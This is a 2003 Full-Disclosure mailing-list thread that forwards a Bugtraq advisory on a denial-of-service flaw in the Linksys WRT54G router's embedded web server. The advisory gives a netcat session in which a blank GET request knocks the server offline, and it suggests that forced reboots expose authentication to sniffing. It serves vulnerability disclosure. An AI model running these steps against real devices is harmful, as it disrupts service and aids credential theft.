Re: [Full-Disclosure] [Fwd: Bugtraq: Linksys WRT54G Denial of Service Vulnerability]
- To: Michael Renzmann <security@dylanic.de>
- Subject: Re: [Full-Disclosure] [Fwd: Bugtraq: Linksys WRT54G Denial of Service Vulnerability]
- From: "kang@insecure.ws" <kang@insecure.ws>
- Date: Thu, 04 Dec 2003 13:12:06 +0100
despite being very similar, my WAP54G *isn't* vulnerable
:)
(Firmware: v1.08, Aug 05, 2003)
Michael Renzmann wrote:
Can anyone confirm if technically identical devices such as the
Buffalo WBR-G54 share this vulnerability?
-------- Original Message --------
Subject: Linksys WRT54G Denial of Service Vulnerability
Date: 3 Dec 2003 22:35:26 -0000
From: <test@techcentric.net>
To: bugtraq@securityfocus.com
Linksys WRT54G Denial of Service Vulnerability
System(s)
===========
Tested on Linksys WRT54G v1.0 (firmware v 1.42.3)
Detail(s)
===========
Sending a blank GET request to the router on port 80 (or 8080) halts
the embedded webserver. This may allow an attacker to force the owner
to reboot the router, allowing them to gain sensitive information
during router authentication.
Exploitation
============
user@test:~$ nc 10.0.0.1 80
GET
user@test:~$ nc 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (http) : Connection refused
user@test:~$
Solution(s)
============
- Https service should continue running for remote access.
- Scan for sniffers that might be on the network before rebooting and
performing any authentication.
- Wait for a vendor patch :)
Status
============
Vendor contacted on 12/03/03.
!HAPPY HOLIDAYS!
carbon@techcentric.net - 12/02/03
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html